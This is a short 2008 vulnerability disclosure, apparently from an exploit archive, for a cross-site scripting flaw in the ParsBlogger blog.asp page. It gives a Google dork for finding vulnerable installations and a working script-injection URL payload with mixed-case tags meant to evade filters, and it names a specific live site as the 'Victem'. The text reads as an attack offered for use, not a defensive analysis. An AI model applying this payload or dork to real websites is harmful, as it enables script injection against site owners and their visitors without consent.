parsblogger-xss.txt
Posted on 28 November 2008
######################################################### --------------------------------------------------------- Portal Name: ParsBlogger Vendor : http://www.parsblogger.com Vulnerable File : blog.asp Dork: Powered by ParsBlogger Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : XSS (Cross site scripting) --------------------------------------------------------- ######################################################### http://www.site.com/[patch]/blog.asp?=>"'><ScRiPt>alert(1369)</ScRiPt> --------------------------------- Victem : http://www.shahedblog.com/blog/blog.asp